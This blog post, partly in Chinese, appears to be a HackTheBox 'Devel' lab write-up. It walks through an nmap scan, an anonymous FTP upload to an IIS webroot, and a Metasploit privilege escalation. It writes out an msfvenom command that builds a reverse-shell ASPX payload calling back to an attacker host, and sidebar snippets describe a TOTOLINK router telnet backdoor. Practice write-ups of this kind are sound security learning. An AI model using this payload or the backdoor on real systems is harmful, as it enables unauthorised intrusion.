HackTheBox Devel:writeup

嘖嘖嘖...試著用cherrytree寫writeup,超煩。

還是比較喜歡hackmd
這台的思路跟我去年打下第一台現實世界的伺服器是差不多的。
提權的部分學到新招:metasploit local exploit suggester!
雖然目前一直用metasploit打起來很爽,但之後考OSCP禁用。 HackTheBox Devel writeup - HackMD
HackTheBox Devel writeup

HackTheBox Devel writeup


Port Scan



┌──(kali㉿kali)-[~/Devel]
└─$ nmap 10.10.10.5 -T4 -A -o nmao.txt          
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-18 23:02 EST
Nmap scan report for 10.10.10.5
Host is up (0.27s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.94 seconds

We see that port 21 and 80 are open, and ftp anonymous access is allowed.

Recon



Going to http://10.10.10.5/ we see a default IIS welcome page:

We could try enumerating hidden directories with dirb or gobuster.
We log into the ftp server as anonymous:

This looks like the webroot of the IIS webserver.
If we can upload files on the server, we could put an aspx webshell and get code execution.

Foothold

Generate the aspx shell with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
images/1-3.png
Upload it to the webroot via ftp:
images/1-4.png
Start the metasploit listener:
images/1-5.png
Request the shell via http:
images/1-6.png
And we got a metepreter shell!
images/1-7.png

Privilege Escalation

We could use winpeas to check for privesc vectors, but I'll stick to metasploit for now.
There's a metasploit module called "local_exploit_suggester" that tries to find privesc exploits.
Just pass it the metepreter session id and run:
images/1-8.png
Tried some of them (some didn't work, finally found one that did).
images/1-9.png
And now we are SYSTEM on the machine!

留言

張貼留言

這個網誌中的熱門文章

TOTOLINK N200RE_v5 Telnet Backdoor

圖片
Wenyi Li @UCCU Hacker Description The telnet service on the router, though disabled by default, can be enabled by an unauthenticated attacker with a single POST request.  The attacker can then login as root with hardcoded credentials. Affected versions Tested on firmware version  V9.3.5u.6139, other versions may also be vulnerable. Cause Analysis The web interface issues  a SESSION_ID cookie upon a successful login. However, the request endpoints do not check for it, resulting in broken access control. POC demo
Read more »

我的第一個 CVE

圖片
CVE-2022-48113    2/3 六點多起床,準備出門參加臺灣好厲駭的培訓。手機拿起來,看到 MITRE 的來信。我的漏洞被分配 CVE 編號並公開了!! 爽爆。 第一次的 CVE 就這樣獻給 TOTOLINK。是個 wifi 分享器 RCE 漏洞。 這其實不是我第一個 0day,之前有回報其他漏洞,但過了好幾個月都沒下文。 自從去年參加 AIS3 和 HITCON 就很想挖 0day。覺得很酷,很屌,很厲害。 這是我學習駭客技術之旅的重大里程碑,非常有成就感。不過研究過程中忽略了生活其它重要的事,經歷了出乎意料的挫折與打擊。 感謝身邊的朋友陪我度過這段低潮期。 希望未來能達成良好的平衡,保持身心健康與研究的熱情。
Read more »